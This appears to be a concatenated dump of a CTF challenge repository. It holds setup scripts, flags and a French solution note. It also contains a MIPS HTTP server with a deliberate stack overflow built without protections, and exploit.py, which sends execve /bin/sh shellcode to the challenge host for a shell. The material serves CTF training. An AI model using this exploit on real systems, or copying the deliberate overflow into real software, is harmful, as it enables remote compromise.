https://raw.githubusercontent.com/nongiach/ctf_challs/3aee9c2d9d85ea3508849613c96ae1c8e865eaec/CaptureTheFIC2020_Quals/pwn/test_player/heapme -------------------------------------------------------------------------------- /CaptureTheFIC2020_Quals/pwn/test_player/libc-2.23.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nongiach/ctf_challs/3aee9c2d9d85ea3508849613c96ae1c8e865eaec/CaptureTheFIC2020_Quals/pwn/test_player/libc-2.23.so -------------------------------------------------------------------------------- /CaptureTheFIC2020_Quals/pwn/test_player/server.crt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nongiach/ctf_challs/3aee9c2d9d85ea3508849613c96ae1c8e865eaec/CaptureTheFIC2020_Quals/pwn/test_player/server.crt -------------------------------------------------------------------------------- /CaptureTheFIC2020_Quals/pwn/zip_hash.txt: -------------------------------------------------------------------------------- 1 | for_the_players.zip:$pkzip2$3*2*1*0*8*24*a581*7271*e5ed5be36292de737ff59bd8d1ba7581892ec1c7c5528bc0397249eacd21c574146bf975*1*0*8*24*1001*af37*a36c82814cf331ded22d10ff78f156bd326fc87906fff190bf70a2804b621cd8c53c7e46*2*0*90*a0*672aa752*0*41*8*90*672a*91d8*ce7244d566c77e15d95853848454d43b27bd785b9cb4f0cf35ba47bdcd164ae97f3d6ced2258c8503827169d8c41732a65c7cb9a4fa5f9233e939ab98e28df67123b81fc68d847786a73a63dc68796a9376995aa02bd523f1a4fd7777882deb36d270b360d63b1f73956248c611d88deb3a04cbd234b0a061bfe00e883979ebdb1f5f80c644bf71f6447fe7ccee34ef6*$/pkzip2$::for_the_players.zip:doc.txt, heapme, libc-2.23.so:for_the_players.zip 2 | -------------------------------------------------------------------------------- /CyberAfricaForum_2021/binary/babi_reverse: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nongiach/ctf_challs/3aee9c2d9d85ea3508849613c96ae1c8e865eaec/CyberAfricaForum_2021/binary/babi_reverse -------------------------------------------------------------------------------- /CyberAfricaForum_2021/binary/calc_reverse: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nongiach/ctf_challs/3aee9c2d9d85ea3508849613c96ae1c8e865eaec/CyberAfricaForum_2021/binary/calc_reverse -------------------------------------------------------------------------------- /CyberAfricaForum_2021/forensic/Security.evtx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nongiach/ctf_challs/3aee9c2d9d85ea3508849613c96ae1c8e865eaec/CyberAfricaForum_2021/forensic/Security.evtx -------------------------------------------------------------------------------- /CyberAfricaForum_2021/forensic/crack_me_if_you_can.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nongiach/ctf_challs/3aee9c2d9d85ea3508849613c96ae1c8e865eaec/CyberAfricaForum_2021/forensic/crack_me_if_you_can.zip -------------------------------------------------------------------------------- /CyberAfricaForum_2021/forensic/gocryptfs_bruteforce.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nongiach/ctf_challs/3aee9c2d9d85ea3508849613c96ae1c8e865eaec/CyberAfricaForum_2021/forensic/gocryptfs_bruteforce.zip -------------------------------------------------------------------------------- /CyberAfricaForum_2021/network/voip.pcap: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nongiach/ctf_challs/3aee9c2d9d85ea3508849613c96ae1c8e865eaec/CyberAfricaForum_2021/network/voip.pcap -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # ctf_challs 2 | All challenge I created for CTF 3 | -------------------------------------------------------------------------------- /breizh2k18_easy_mips/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM ubuntu:latest 2 | # docker run -p 4242:4242 --name ex --cap-add=SYS_PTRACE -v $PWD/chall:/chall --rm -it exploit bash 3 | EXPOSE 4242/tcp 4 | RUN apt-get update && apt-get install -y python3 python3-pip wget \ 5 | gdb valgrind git sudo vim 6 | # RUN apt-get install -y python python-pip wget && pip2 install --upgrade pip 7 | RUN apt-get install -y python python-pip wget 8 | RUN apt-get install -y e2tools qemu 9 | RUN pip2 install pwntools 10 | # RUN pip3 install --upgrade pip && pip3 install https://github.com/nongiach/arm_now/archive/master.zip 11 | # RUN apt-get install -y gcc-arm-linux-gnueabi 12 | RUN apt-get install -y gcc-mipsel-linux-gnu 13 | # RUN pip3 install --upgrade pip && pip3 install https://github.com/nongiach/arm_now/archive/master.zip 14 | RUN pip3 install https://github.com/nongiach/arm_now/archive/master.zip 15 | 16 | RUN arm_now install mips32el 17 | 18 | COPY ./chall /chall 19 | 20 | RUN cd /chall && ./post_install_mips.sh && \ 21 | rm post_install_mips.sh && \ 22 | rm inittab 23 | 24 | WORKDIR /chall 25 | RUN chmod 777 -R /chall 26 | 27 | RUN useradd tata 28 | USER tata 29 | -------------------------------------------------------------------------------- /breizh2k18_easy_mips/README.md: -------------------------------------------------------------------------------- 1 | # Easy_mips 2 | name: easy_mips 3 | 4 | desc: A basic stack buffer overflow on mips cpu. you are given the binary, the source code and the host:port. 5 | 6 | point: 400 and pwn 4 times 7 | 8 | ctf: https://breizhctf.com 9 | 10 | You can easily deploy the challenge by starting ./docker.sh, it will setup everything using docker. 11 | 12 | wait 30 secondes and you can connect to the port 4242. 13 | 14 | ```sh 15 | mipsel_breizh2k18 $ nc 127.0.0.1 4242 16 | BabyHttp brought to you by @chaign_c 17 | ``` 18 | 19 | tips: use arm_now tool to debug a mips program https://github.com/nongiach/arm_now 20 | 21 | Writeups: 22 | 23 | | Credit | link | 24 | | --- | --- | 25 | | [Aperikube](https://twitter.com/AperiKube) | http://www.aperikube.fr/docs/breizhctf_2018_mips/ | 26 | | [gov](https://twitter.com/govlog) | https://0bin.net/paste/TAOFEXebo71Lq6Es#VsAR6+5aqycYxg3C4YgQ1K5BjoUfUPayhEltlLWiBqi | 27 | 28 | ---- 29 | By [@chaign\_c][] [#HexpressoTeam][hexpresso]. 30 | 31 | 32 | [hexpresso]: https://hexpresso.github.io 33 | [@chaign\_c]: https://twitter.com/chaign_c 34 | -------------------------------------------------------------------------------- /breizh2k18_easy_mips/README.txt: -------------------------------------------------------------------------------- 1 | ================================================================ 2 | ########## chall description 3 | ================================================================ 4 | Titre: arm_now them all 5 | Points: 250 6 | 7 | Host: METTRE HOST ICI, Port: 4242 8 | Download: ./vuln 9 | 10 | ================================================================ 11 | ########## note pour kaluche et saxx 12 | ================================================================ 13 | Demarrer le challenge comme suit: 14 | $ ./docker.sh 15 | ------------------------- 16 | 17 | Mettre a disposition des joueurs le port 4242 et le binaire ./vuln. 18 | Le flag est dans le chall et peut être reset avec le script ./regenerate_flag.sh 19 | ------------------------- 20 | 21 | Pour tester si le challenge est bien setup faire: 22 | $ nc host 4242 23 | BabyHttp brought to you by @chaign_c 24 | ------------------------- 25 | 26 | Pour tester si la vm est pwnable avec ma solution: 27 | $ docker exec -it ctf bash 28 | $ ./exploit.py 29 | $ cat flag 30 | ... 31 | ------------------------- 32 | 33 | Ceci est un challenge mipsel, exploit d'un stack overflow avec zero protection. 34 | Pas d'aslr, pas de ssp, pas de nx... 35 | Une erreur dans une pauvre boucle de urlencode, 36 | mais c'est un peu plus marrant a exploit qu'un strcpy. 37 | 38 | La vm mipsel va démarer est bind le port 4242 du host, 39 | ce port doit être accéssible aux joueurs. 40 | Ca sera leur seul vecteur d'attaque, ils auront également 41 | accès au binaire et au code source. 42 | 43 | Le docker doit être redémarré automatiquement toutes les 5 minutes, 44 | de cette manière elle reste clean. 45 | -------------------------------------------------------------------------------- /breizh2k18_easy_mips/chall/Makefile: -------------------------------------------------------------------------------- 1 | 2 | CC = mipsel-linux-gnu-gcc 3 | CFLAGS += -W -Wall -Wextra 4 | 5 | all: 6 | $(CC) main.c -o vuln -z execstack -static -fno-stack-protector 7 | 8 | clean: 9 | rm vuln 10 | -------------------------------------------------------------------------------- /breizh2k18_easy_mips/chall/easy_mips.tar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nongiach/ctf_challs/3aee9c2d9d85ea3508849613c96ae1c8e865eaec/breizh2k18_easy_mips/chall/easy_mips.tar -------------------------------------------------------------------------------- /breizh2k18_easy_mips/chall/exploit.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python2 2 | 3 | import os 4 | import sys 5 | import pwn as p 6 | from pwnlib.util.cyclic import cyclic as cyclic 7 | 8 | # http://shell-storm.org/shellcode/files/shellcode-80.php 9 | shellcode = "\x50\x73\x06\x24"\ 10 | "\xff\xff\xd0\x04"\ 11 | "\x50\x73\x0f\x24"\ 12 | "\xff\xff\x06\x28"\ 13 | "\xe0\xff\xbd\x27"\ 14 | "\xd7\xff\x0f\x24"\ 15 | "\x27\x78\xe0\x01"\ 16 | "\x21\x20\xef\x03"\ 17 | "\xe8\xff\xa4\xaf"\ 18 | "\xec\xff\xa0\xaf"\ 19 | "\xe8\xff\xa5\x23"\ 20 | "\xab\x0f\x02\x24"\ 21 | "\x0c\x01\x01\x01"\ 22 | "/bin/sh\x00" 23 | 24 | nop = "\xff\xff\x06\x28" 25 | shellcode = nop * 100 + shellcode 26 | 27 | payload = b"GET %\x00A" 28 | pattern = bytearray(cyclic(1000)) 29 | 30 | read_buffer = 0x7fffe974 31 | shellcode_offset = 60 # must be a multple of 4 32 | shellcode_addr = read_buffer + shellcode_offset + 4 * 40 33 | pattern[36:40] = p.p32(shellcode_addr) 34 | pattern[41] = b"\x00" # end urldecode loop 35 | payload += pattern 36 | payload = bytearray(payload) 37 | 38 | payload[shellcode_offset:shellcode_offset+len(shellcode)] = shellcode 39 | 40 | r = p.remote("breizhctf.serveur.io", 4242) 41 | r.send(payload) 42 | r.interactive() 43 | -------------------------------------------------------------------------------- /breizh2k18_easy_mips/chall/flag: -------------------------------------------------------------------------------- 1 | b955c4e6aeffe3c63d2e922710323198 2 | -------------------------------------------------------------------------------- /breizh2k18_easy_mips/chall/init.sh: -------------------------------------------------------------------------------- 1 | export PATH="$PATH:/opt/bin:/opt/sbin" 2 | 3 | cd /root 4 | which opkg || 5 | (sh install_pkg_manager.sh && 6 | opkg install ncat && 7 | poweroff -f) 8 | echo 0 > /proc/sys/kernel/randomize_va_space 9 | echo | adduser lamer 10 | chmod 000 * 11 | chmod +rx ./vuln . 12 | chmod +r flag 13 | ncat -k -l -p 4242 -c "su lamer -c ./vuln" 14 | -------------------------------------------------------------------------------- /breizh2k18_easy_mips/chall/inittab: -------------------------------------------------------------------------------- 1 | # /etc/inittab 2 | # 3 | # Copyright (C) 2001 Erik Andersen 4 | # 5 | # Note: BusyBox init doesn't support runlevels. The runlevels field is 6 | # completely ignored by BusyBox init. If you want runlevels, use 7 | # sysvinit. 8 | # 9 | # Format for each entry: ::: 10 | # 11 | # id == tty to run on, or empty for /dev/console 12 | # runlevels == ignored 13 | # action == one of sysinit, respawn, askfirst, wait, and once 14 | # process == program to run 15 | 16 | # Startup the system 17 | ::sysinit:/bin/mount -t proc proc /proc 18 | ::sysinit:/bin/mount -o remount,rw / 19 | ::sysinit:/bin/mkdir -p /dev/pts 20 | ::sysinit:/bin/mkdir -p /dev/shm 21 | ::sysinit:/bin/mount -a 22 | ::sysinit:/bin/hostname -F /etc/hostname 23 | # now run any rc scripts 24 | ::sysinit:/etc/init.d/rcS 25 | 26 | # Put a getty on the serial port 27 | # ttyS0::respawn:/sbin/getty -L ttyS0 0 vt100 # GENERIC_SERIAL 28 | ttyS0::sysinit:/bin/sh /root/init.sh 29 | 30 | # Stuff to do for the 3-finger salute 31 | #::ctrlaltdel:/sbin/reboot 32 | 33 | # Stuff to do before rebooting 34 | ::shutdown:/etc/init.d/rcK 35 | ::shutdown:/sbin/swapoff -a 36 | ::shutdown:/bin/umount -a -r 37 | -------------------------------------------------------------------------------- /breizh2k18_easy_mips/chall/install.sh: -------------------------------------------------------------------------------- 1 | ./install_pkg_manager.sh 2 | opkg install ncat 3 | -------------------------------------------------------------------------------- /breizh2k18_easy_mips/chall/main.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | 6 | void urldecode(char *dst, const char *src) 7 | { 8 | char a, b; 9 | while (*src) { 10 | if (*src == '%') { 11 | a = src[1]; 12 | b = src[2]; 13 | if (isxdigit(a) && isxdigit(b)) { 14 | if (a >= 'a') 15 | a -= 'a'-'A'; 16 | if (a >= 'A') 17 | a -= ('A' - 10); 18 | else 19 | a -= '0'; 20 | if (b >= 'a') 21 | b -= 'a'-'A'; 22 | if (b >= 'A') 23 | b -= ('A' - 10); 24 | else 25 | b -= '0'; 26 | *dst++ = 16*a+b; 27 | } 28 | src+=3; 29 | } else if (*src == '+') { 30 | *dst++ = ' '; 31 | src++; 32 | } else { 33 | *dst++ = *src++; 34 | } 35 | } 36 | *dst++ = '\0'; 37 | } 38 | 39 | char not_found[] = "

The requested URL %s was not found on this server. That’s all we know.\n"; // sorry for the xss 40 | 41 | void handle_client(char request[]) { 42 | char url[32]; 43 | 44 | if (!strncmp(request, "GET ", 4)) { 45 | if (strlen(request + 4) < sizeof(url)) { 46 | urldecode(url, request + 4); 47 | printf(not_found, url); 48 | fflush(stdout); 49 | } 50 | } 51 | } 52 | 53 | void baby_http() { 54 | char request[1024]; 55 | 56 | while (42) { 57 | int size = read(0, request, 1023); 58 | request[size] = 0; 59 | handle_client(request); 60 | } 61 | } 62 | 63 | int main() 64 | { 65 | printf("BabyHttp brought to you by @chaign_c\n"); 66 | fflush(stdout); 67 | baby_http(); 68 | return 0; 69 | } 70 | // what is arm_now ? 71 | -------------------------------------------------------------------------------- /breizh2k18_easy_mips/chall/post_install_mips.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash -i 2 | 3 | rm -rf arm_now 4 | cp /arm_now . -a 5 | e2rm ./arm_now/rootfs.ext2:/etc/inittab 6 | e2cp -G 0 -O 0 -P 555 ./inittab ./arm_now/rootfs.ext2:/etc/inittab 7 | arm_now start mips32el --sync --redir tcp:4242::4242 8 | cp arm_now /clean -a 9 | 10 | # rm -rf arm_now 11 | # cp /clean arm_now -a 12 | # arm_now start mips32el --sync --redir tcp:4242::4242 13 | 14 | # while [ true ] 15 | # do 16 | # timeout 30s arm_now start mips32el --sync --redir tcp:4242::4242 17 | # done 18 | -------------------------------------------------------------------------------- /breizh2k18_easy_mips/chall/start_arm_now_mips.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash -i 2 | 3 | arm_now start mips32el --sync --redir tcp:4242::4242 4 | 5 | # while [ true ] 6 | # for i in {0..10} 7 | # do 8 | # kill -s $(pgrep qemu-system-mipsel) 9 | # rm -rf arm_now 10 | # cp /clean arm_now -a 11 | # timeout 1m arm_now start mips32el --sync --redir tcp:4242::4242 12 | # reset 13 | # stty intr ^c 14 | # sleep 10s 15 | # done 16 | -------------------------------------------------------------------------------- /breizh2k18_easy_mips/chall/vuln: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nongiach/ctf_challs/3aee9c2d9d85ea3508849613c96ae1c8e865eaec/breizh2k18_easy_mips/chall/vuln -------------------------------------------------------------------------------- /breizh2k18_easy_mips/docker.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | docker kill ctf 3 | docker build -t ctf . 4 | echo start ctf docker 5 | docker run -p 4242:4242/tcp -d --name ctf --rm -it ctf bash -i /chall/start_arm_now_mips.sh 6 | # docker run -v $PWD/chall:/chall -p 4242:4242/tcp -d --name ctf --rm -it ctf bash -i /chall/start_arm_now_mips.sh 7 | # docker kill ctf 8 | -------------------------------------------------------------------------------- /breizh2k18_easy_mips/regenerate_flag.sh: -------------------------------------------------------------------------------- 1 | dd if=/dev/urandom bs=32 count=1 | md5sum | cut -d ' ' -f 1 > chall/flag 2 | -------------------------------------------------------------------------------- /breizh2k19/go_reverse/.gdb_history: -------------------------------------------------------------------------------- 1 | b runtime.cmpstring 2 | r 3 | b runtime.cmpstring 4 | r 5 | -------------------------------------------------------------------------------- /breizh2k19/go_reverse/Makefile: -------------------------------------------------------------------------------- 1 | all: 2 | go build 3 | 4 | clean: 5 | rm gogo 6 | -------------------------------------------------------------------------------- /breizh2k19/go_reverse/flag.txt: -------------------------------------------------------------------------------- 1 | BREIZHCTF{Le_monde_est_un_jeu_de_go_dont_les_regles_ont_ete_inutilement_compliquees} 2 | -------------------------------------------------------------------------------- /breizh2k19/go_reverse/gogo: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nongiach/ctf_challs/3aee9c2d9d85ea3508849613c96ae1c8e865eaec/breizh2k19/go_reverse/gogo -------------------------------------------------------------------------------- /breizh2k19/go_reverse/main.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "crypto/md5" 5 | "encoding/hex" 6 | "bufio" 7 | "fmt" 8 | "os" 9 | "strings" 10 | ) 11 | 12 | func GetMD5Hash(text string) string { 13 | hasher := md5.New() 14 | hasher.Write([]byte(text)) 15 | return hex.EncodeToString(hasher.Sum(nil))[:4] 16 | } 17 | 18 | func hash_password(password string) string { 19 | var hashed_password strings.Builder 20 | for i := 0; i+2 <= len(password); i += 2 { 21 | var password_slice string = password[i:i+2] 22 | hashed_password.WriteString(GetMD5Hash(password_slice)) 23 | } 24 | return hashed_password.String() 25 | } 26 | 27 | func process_password() { 28 | fmt.Print("Password:") 29 | reader := bufio.NewReader(os.Stdin) 30 | password, _ := reader.ReadString('\n') 31 | password = strings.Replace(password, "\n", "", -1) 32 | // fmt.Println(hash_password(password)) 33 | if strings.Compare("19d355de2f36112c6489bccdb781ed2b5f023177627f3b5e8054795654055f0213e9b8aad457259337c9124736462a6ad9182c3bed2b33d84de1bfbe13b5b1a5460547e29cfe33d8ab6c1f2dd70c0e2a08a4b5c7", hash_password(password)) == 0 { 34 | fmt.Println("Well Done") 35 | } else { 36 | fmt.Println("Shame on you, you deserve a rm -rf --no-preserve-root /") 37 | } 38 | 39 | } 40 | 41 | func main() { 42 | fmt.Println("WARNING: This program is very dangerous do not run it on a production system!!") 43 | fmt.Println("Please snapshot your vm before continuing.") 44 | fmt.Println("Do you want to continue? (yes/no)?") 45 | reader := bufio.NewReader(os.Stdin) 46 | text, _ := reader.ReadString('\n') 47 | 48 | if strings.Compare("yes\n", text) == 0 { 49 | process_password() 50 | } else { 51 | fmt.Println("Exiting... Don't worry I only delete one file this time."); 52 | } 53 | } 54 | -------------------------------------------------------------------------------- /breizh2k19/go_reverse/peda-session-gogo.txt: -------------------------------------------------------------------------------- 1 | break runtime.cmpstring 2 | 3 | -------------------------------------------------------------------------------- /breizh2k19/go_reverse/solution.txt: -------------------------------------------------------------------------------- 1 | voir qu'il s'agit d'un binaire go non strippé. 2 | nm binaire | grep cmp 3 | mettre un breakpoint dans la fonction "runtime.cmpstring". 4 | 5 | b runtime.cmpstring 6 | on voit la string avec la comparaison est faite. 7 | On se rend vite compte que les caractères sont hashés 2 par 2. 8 | hash(deux charactères ab) => md5(ab)[:2] 9 | solution 1: faire un dico des toutes les possibilités de hash. (65535 possibilité, 32639 si on prend que ce qui est affichable) 10 | solution 2: bf les caractères deux par deux. 11 | -------------------------------------------------------------------------------- /breizh2k19/reverse_ppc/generate_flag: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nongiach/ctf_challs/3aee9c2d9d85ea3508849613c96ae1c8e865eaec/breizh2k19/reverse_ppc/generate_flag -------------------------------------------------------------------------------- /breizh2k19/reverse_ppc/generate_flag.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | 6 | typedef unsigned long int u4; 7 | typedef struct ranctx { u4 a; u4 b; u4 c; u4 d; } ranctx; 8 | 9 | #define rot(x,k) (((x)<<(k))|((x)>>(32-(k)))) 10 | u4 ranval( ranctx *x ) { 11 | u4 e = x->a - rot(x->b, 27); 12 | x->a = x->b ^ rot(x->c, 17); 13 | x->b = x->c + x->d; 14 | x->c = x->d + e; 15 | x->d = e + x->a; 16 | return x->d; 17 | } 18 | 19 | void raninit( ranctx *x, u4 seed ) { 20 | u4 i; 21 | x->a = 0xf1ea5eec, x->b = x->c = x->d = seed; 22 | for (i=0; i<20; ++i) { 23 | (void)ranval(x); 24 | } 25 | } 26 | 27 | 28 | unsigned int init_transpose(ranctx *state, unsigned int *transpose, unsigned int *ntranspose) { 29 | for (unsigned int i = 0; i < 256; i++) { 30 | transpose[i] = i; 31 | ntranspose[i] = i; 32 | } 33 | for (unsigned int i = 0; i < 256; i++) { 34 | unsigned int v = ranval(state) % 256; 35 | transpose[i] = transpose[i] ^ transpose[v]; 36 | transpose[v] = transpose[i] ^ transpose[v]; 37 | transpose[i] = transpose[i] ^ transpose[v]; 38 | } 39 | for (unsigned int i = 0; i < 256; i++) { 40 | ntranspose[transpose[i]] = i; 41 | } 42 | } 43 | 44 | void do_transpose(unsigned char *s, unsigned int *transpose) { 45 | for (unsigned int i = 0; s[i]; i++) { 46 | /* printf("%u => %u, %c => %c\n", */ 47 | /* s[i], transpose[s[i]], */ 48 | /* s[i], transpose[s[i]]); */ 49 | s[i] = transpose[s[i]]; 50 | } 51 | } 52 | 53 | void do_print(unsigned char *s) { 54 | /* printf("%s\n", s); */ 55 | for (unsigned int i = 0; s[i]; i++) { 56 | printf("%u,", s[i]); 57 | } 58 | printf("0"); 59 | printf("\n"); 60 | } 61 | 62 | int main(int ac, char **av) { 63 | // apt install gcc-7-powerpc64-linux-gnu 64 | // powerpc64-linux-gnu-gcc-7 main.c -o ppc 65 | if (ac == 1) { 66 | printf("Usage: ./generate_flag flag\n"); 67 | exit(1); 68 | } 69 | ranctx state; 70 | raninit(&state, 0x378687); 71 | 72 | unsigned int transpose[256] = {0}; 73 | unsigned int r_transpose[256] = {0}; 74 | init_transpose(&state, transpose, r_transpose); 75 | 76 | /* unsigned char flag[] = "Br{ThisIsTheFuckingFlag}"; */ 77 | unsigned char *flag = av[1]; 78 | /* unsigned char flag[] = {219,135,32,124,200,124,219,135,62,142,118,69,74,32,149,37,142,44,157,37, 0}; */ 79 | /* unsigned char input[256]; */ 80 | /* write(1, "Password: ", 10); */ 81 | /* int read_ret = read(0, input, 256); */ 82 | /* input[read_ret - 1] = 0; */ 83 | do_transpose(flag, transpose); 84 | do_print(flag); 85 | /* if (strcmp(input, flag) == 0) { */ 86 | /* printf("Good job, @chaignc is proud of you\n"); */ 87 | /* } else { */ 88 | /* printf("Bad password\n"); */ 89 | /* } */ 90 | return 0; 91 | } 92 | -------------------------------------------------------------------------------- /breizh2k19/reverse_ppc/main.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | typedef unsigned long int u4; 6 | typedef struct ranctx { u4 a; u4 b; u4 c; u4 d; } ranctx; 7 | 8 | #define rot(x,k) (((x)<<(k))|((x)>>(32-(k)))) 9 | u4 ranval( ranctx *x ) { 10 | u4 e = x->a - rot(x->b, 27); 11 | x->a = x->b ^ rot(x->c, 17); 12 | x->b = x->c + x->d; 13 | x->c = x->d + e; 14 | x->d = e + x->a; 15 | return x->d; 16 | } 17 | 18 | void raninit( ranctx *x, u4 seed ) { 19 | u4 i; 20 | x->a = 0xf1ea5eec, x->b = x->c = x->d = seed; 21 | for (i=0; i<20; ++i) { 22 | (void)ranval(x); 23 | } 24 | } 25 | 26 | unsigned int init_transpose(ranctx *state, unsigned int *transpose, unsigned int *ntranspose) { 27 | for (unsigned int i = 0; i < 256; i++) { 28 | transpose[i] = i; 29 | ntranspose[i] = i; 30 | } 31 | for (unsigned int i = 0; i < 256; i++) { 32 | unsigned int v = ranval(state) % 256; 33 | transpose[i] = transpose[i] ^ transpose[v]; 34 | transpose[v] = transpose[i] ^ transpose[v]; 35 | transpose[i] = transpose[i] ^ transpose[v]; 36 | } 37 | /* for (unsigned int i = 0; i < 256; i++) { */ 38 | /* ntranspose[transpose[i]] = i; */ 39 | /* } */ 40 | } 41 | 42 | void do_transpose(unsigned char *s, unsigned int *transpose) { 43 | for (unsigned int i = 0; s[i]; i++) { 44 | /* printf("%u => %u, %c => %c\n", */ 45 | /* s[i], transpose[s[i]], */ 46 | /* s[i], transpose[s[i]]); */ 47 | s[i] = transpose[s[i]]; 48 | } 49 | } 50 | 51 | void do_print(unsigned char *s) { 52 | printf("%s\n", s); 53 | for (unsigned int i = 0; s[i]; i++) { 54 | printf("%u,", s[i]); 55 | } 56 | printf("\n"); 57 | } 58 | 59 | int main() { 60 | // apt install gcc-8-powerpc64-linux-gnu 61 | // powerpc64-linux-gnu-gcc-8 main.c -o sh 62 | ranctx state; 63 | raninit(&state, 0x378687); 64 | 65 | unsigned int transpose[256] = {0}; 66 | unsigned int r_transpose[256] = {0}; 67 | init_transpose(&state, transpose, r_transpose); 68 | 69 | /* unsigned char flag[] = "ThisIsTheFuckingFlag"; */ 70 | /* unsigned char flag[] = {219,135,32,124,200,124,219,135,62,142,118,69,74,32,149,37,142,44,157,37, 0}; */ 71 | /* unsigned char flag[] = {221,227,173,160,219,142,134,0}; // "Br{CTF}" */ 72 | unsigned char flag[] = {221,23,138,200,119,117,160,219,142,173,160,62,118,203,144,34,118,32,144,118,225,32,44,32,124,62,149,225,144,157,227,12,144,149,170,175,144,37,157,37,149,62,149,225,144,166,118,144,225,62,12,78,124,134,0}; 73 | unsigned char input[256]; 74 | write(1, "Password: ", 10); 75 | int read_ret = read(0, input, 256); 76 | input[read_ret - 1] = 0; 77 | do_transpose(input, transpose); 78 | if (strcmp(input, flag) == 0) { 79 | printf("Good job, @chaignc is proud of you\n"); 80 | } else { 81 | printf("Bad password\n"); 82 | } 83 | return 0; 84 | } 85 | -------------------------------------------------------------------------------- /breizh2k19/reverse_ppc/sh: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nongiach/ctf_challs/3aee9c2d9d85ea3508849613c96ae1c8e865eaec/breizh2k19/reverse_ppc/sh --------------------------------------------------------------------------------